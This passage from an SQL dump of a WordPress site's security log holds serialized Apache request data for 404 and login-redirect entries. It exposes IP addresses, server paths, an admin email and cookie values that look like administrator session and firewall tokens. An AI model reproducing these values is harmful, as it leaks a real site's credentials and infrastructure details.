01:45:04',30766592,32572872,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26841,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:3:\"8-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Cae037e399c581499e00dd73a9fb4f3c00deaa9417933930059c63a26947e5432; icwp-wpsf=6dc30aa3a01585fd8b7df7cf49f54d2f; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569201372\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"8-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgjgdgT8SLwZ2vcJZwRngAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgjgdgT8SLwZ2vcJZwRngAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"49912\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgjgdgT8SLwZ2vcJZwRngAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569203073.5648\";s:12:\"REQUEST_TIME\";s:10:\"1569203073\";}}','notice','2019-09-23 01:44:35','2019-09-23 01:44:34',30734552,32547200,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26840,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:4:\"85-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=51eb4e1567f978984b29f2f18e4c65cd\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"85-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgjWDXwAkGgnPePZ3HIngAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgjWDXwAkGgnPePZ3HIngAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"50395\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgjWDXwAkGgnPePZ3HIngAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569203032.8918\";s:12:\"REQUEST_TIME\";s:10:\"1569203032\";}}','notice','2019-09-23 01:43:54','2019-09-23 01:43:53',30766592,32572872,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26839,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"23-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Cae037e399c581499e00dd73a9fb4f3c00deaa9417933930059c63a26947e5432; icwp-wpsf=6dc30aa3a01585fd8b7df7cf49f54d2f; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569201372\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"23-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgjNtgT8SLwZ2vcJZwRZAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgjNtgT8SLwZ2vcJZwRZAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"49856\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgjNtgT8SLwZ2vcJZwRZAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569202998.1402\";s:12:\"REQUEST_TIME\";s:10:\"1569202998\";}}','notice','2019-09-23 01:43:19','2019-09-23 01:43:18',30738880,32557512,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26838,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:66:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"128-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Cae037e399c581499e00dd73a9fb4f3c00deaa9417933930059c63a26947e5432; icwp-wpsf=6dc30aa3a01585fd8b7df7cf49f54d2f; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569201372\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"128-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgij8FqgMX-PLsgt8c0DAAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgij8FqgMX-PLsgt8c0DAAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"51586\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgij8FqgMX-PLsgt8c0DAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569202831.1668\";s:12:\"REQUEST_TIME\";s:10:\"1569202831\";}}','notice','2019-09-23 01:40:32','2019-09-23 01:40:31',30737656,32548464,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26815,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/dropbox-business-features/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3371.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/dropbox-business-features/\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/dropbox-business-features/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYd159eO@M5TS0tioplxdQAAAEo\";s:12:\"REDIRECT_URL\";s:27:\"/dropbox-business-features/\";s:11:\"REMOTE_ADDR\";s:11:\"69.58.0.174\";s:11:\"REMOTE_PORT\";s:5:\"29205\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/dropbox-business-features/\";s:10:\"SCRIPT_URL\";s:27:\"/dropbox-business-features/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYd159eO@M5TS0tioplxdQAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569158631.8998\";s:12:\"REQUEST_TIME\";s:10:\"1569158631\";}}','notice','2019-09-22 13:23:53','2019-09-22 13:23:52',30748424,32564784,'https://bintara.com.my/dropbox-business-features/',1,0,'69.58.0.174'),(26816,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9275BA3E-51D8-4506-932F-B544236FDBE1\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYeIJeHT9TtrAHgWcH3q1AAAAA0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"42.153.139.143\";s:11:\"REMOTE_PORT\";s:4:\"9731\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYeIJeHT9TtrAHgWcH3q1AAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569163301.1908\";s:12:\"REQUEST_TIME\";s:10:\"1569163301\";}}','notice','2019-09-22 14:41:42','2019-09-22 